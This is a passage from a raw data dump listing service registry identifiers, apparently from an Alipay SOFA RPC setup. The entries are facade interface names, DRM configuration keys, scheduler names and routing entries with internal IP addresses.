ay.rule.core.engine.config.RuleEngineResource.globalCloseRouteStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dwalm.facade.api.FmGuardianQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zprodmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.hitchqualitative.UsabilityQualitativeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_PCIEP_ASYN_CMD@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:fincontentweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.dcommservice.common.service.facade.api.TransactionHistory:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:finassistantcore_tenant_uiConfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.esp.hbase.interfaces.endpoint.facade.rest.UserRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.instpay.settleprod.service.facade.agency.PartnerAgentFileImportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_instChannelArModifyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.InvestElementManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.user.SecuUserManagerV3:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.promo.service.LotteryOpenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:creditutcoreAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.atomic.service.facade.product.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.template.ItemTemplateQueryGzoneFacde:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.audit.AuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.activity.CommercialActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.195.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-userdataconsumer-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secuprod.biz.service.gw.community.api.text.SecuTextGWManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finmatchcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.ucm.core.manager.FeedbackFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zcache:name=com.alipay.zdal.ldc.tair.custassetTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rpartner.service.facade.RigelTaskDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.FaAssetInfoQueryFacade:1.0:queryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.clientpublish.drm.ClientPublishDRMImpl.hotpatchIncrSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.PointCapacityDrmResouce.removeOracleLoadCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppgw.facade.ChargeOffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcservcenter.client.RcClientInvoker:1.0:rcswitchbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.preCalcDirtyProtocols,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.Role.RoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.delivery.rpc.AckCodeRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.MenuSwitcher.fortunePidWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.antschedulerconsole.endpoint.facade.ISlaRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbservcore.common.service.facade.operator.OperatorPermissionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.operatorlog.OperatorLogQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.rcacheTairCache_dest.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.common.spi.service.CodeRouteService:1.0:transferprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.ConfigContextManager:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dayutrprod.common.facade.capacity.ActivityWsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditcore.service.facade.trans.CreditCoreTransFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINANNAFCCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwalm.facade.api.FmCashPoolManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insassetprod.common.service.facade.property.screen.PortalScreenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.cif.UserInfoQueryServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.14.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:erecon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-bkftranscore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mashup:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_INDUSTRY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.decisionx.engine.common.api.ResourceStatusService:1.0:ins_marketing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.OssFileOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_rctrack-updateChainStatus#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.SyncRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ebppprod.common.service.facade.recharge.flow.FlowRechargeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditkit.facade.operationconfig.ConfigEnumQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.recruit2.RecruitCmpEnrollQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.OpenCertifyActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amspm.finmeta.api.MetaModelDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.79.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:gfacceptance.product.AgencyProduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.buc.acl.api.service.PropertyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.product.query.ProductQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdssp.service.UploadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.132.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.5.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.254.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paybatch.common.service.facade.spi.OrderExecutor:1.0:fascore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.facade.api.AccountingRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.necquery.common.service.credit.CreditAuthzQueryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.OperationConfigCallbackFacade:1.0:mmtcaftscv@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwxmen2.common.service.facade.ScheduleTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.express.query.AgreementQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zbdm.common.service.facade.biz.BizColumnInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.nodejs.ConsumerService:1.0:larrychairtest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:zparamcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_MCARD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.alipaypointcust.biz.rpc.apoint.MiniAppGiftTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianFlushPeriod,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.searchportal.common.service.facade.appcenter.SchAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IFXTRADE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bkpromofront.facade.actionflow.api.ActionFlowQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:gfacceptance.product.IncomeConfirmProduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:openexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pamir.security.PamSecurityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:metricRemoveProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.network.NetworkPlatFormAnalyzeQueryService:1.0:securitydatacbackend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.prepaidcard.api.PctransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.agent.InsLifeAgentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.expgrowth.facade.api.ManageContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.biz.platform.task.complainmessage.BizToTaskDataManager:1.0:bizToTaskDataManager@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_LINKM#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.CourseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imdop.common.service.facade.GeTimestampService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","mdevsupport@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininfo.common.service.facade.mng.query.InfoSerialQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.financing.service.facade.ManualProcessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.graycheck.GrayCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:consumeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.CrowdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custinsight.common.service.facade.visitor.AppListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.SugQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FRDECISION#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insuserinsight.facade.usergroup.AutoUserGroupMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradecore:name=com.alipay.tradecore.common.service.integration.drm.resource.DrmForSupportPresetPaytool.drmForSupportPresetPaytool,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.1.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.accrmcore.common.service.facade.InvoiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.admediamgr.common.service.facade.service.PaymentBlacklistServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:pcmerchantprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.tinyapp.TinyAppContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.prodcenter.common.service.facade.query.api.contract.ArrangementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.ucm.core.UcmQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.metadatacenter.facade.api.FeatureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.yebcore.common.facade.service.query.PromoAssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zookeeperTest.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerExterfaceManageFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.chat.api.MessageReadService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.topic.TopicConcernQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.recon.common.service.facade.api.InstItemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csmng.common.service.facade.ClaimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.agaccesstoken.AgATKAccessTokenViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.122.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.164.185.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.27.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.admgr.common.service.facade.ActivityFunctionPkgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_GIFT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.Arch:name=com.alipay.xts.ldc.insttrade.changeMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pucprod.common.service.facade.external.PucConfigeManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.246.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileorderprod.service.api.mng.TagDefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.211.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","sofaservice.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache_dest.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingcore.common.service.facade.InsSalePlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:varuda@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.108.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.173.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintradecenter.biz.trade.service.FintradePaidService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.v3.service.facade.api.InformationSpecialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.instOnlineServiceDrm.isSupportOnlineService,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.sd.facade.service.AgdsPlatformCreditDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.common.auth.foundation.facade.AuthInfrastructureServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.core.task.processor.RedoDetailProcessor:1.0:replayProcessor.busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.InfrastructureInfoUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.integrationprod.common.service.facade.HistoricalAccountingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.mng.EbillDataCollectProcessorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.robot.RobotQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.132.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.application:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fascore.common.service.facade.local.FundFinishPayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mremindprod:name=com.alipay.mremindprod.common.ldc.MRemindProdLdcDrmConfig.openLDCSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.msgopprod.common.service.facade.appinfo.AppInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.product.ProductConfigureFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:innertransAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.NetworkDeviceRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.prepaidcard.MemberPrepaidCardProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.ebpp.ChargeInstServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.appsearch.MiniAppSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.serverless.api.VenueDeliverFacade:1.0:ucdpcore-default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.l2cache.L2CacheServerSwitch.versionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.admediamgr.common.service.facade.service.BusDeviceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.138.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","TestService:1.0:unique123Id@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dataphin-scheduleproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommons.common.spi.api.ArtisanComponentSpiFacade:1.0:myBankSettleAccountSpi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.couponTemplateConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_C_CR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.service.facade.message.UserMsgSubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:datariskmarket-parent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CSTRATEGYCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finaicontentcore.api.topic.TopicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tr-service-enable:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.1.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundtrade.common.service.facade.api.FundAssetChangeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.shadowExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opensupport.common.service.facade.onestopmng.OstsWorkOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.client.facade.appgw.AppGWFacade:1.0:BKCLOUDFUNDS_APPGW@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.184.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zerox.common.service.facade.UctlabCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.159.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.mydds.common.service.facade.api.DataDecisionLDCService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_C_POINT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.developerops.facade.api.faq.FaqManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.insbffweb.chair.Config.consumeFirstDayUnix,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:mapTypeTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.deployorder.DeployTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.AuthorizationCzoneQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dtbank.facade.dashboard.CampDashboardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitFrameConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkwirelessdataportal.common.service.panda.ProductManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.qconsole.facade.dal.SubscriptionRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.iliquidity.biz.manager.mng.UserStructureSettingManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotstore.common.falcon.manage.facade.api.FalconEmendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.support.tenant.SupportTenantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliinvoiceprod.core.service.event.AipEventSender:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthNewCrownFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.52.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdatasync.common.service.facade.DCDataSyncFacade:1.0:unitradeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.236.64#@#DEFAULT_INSTANCE_ID#@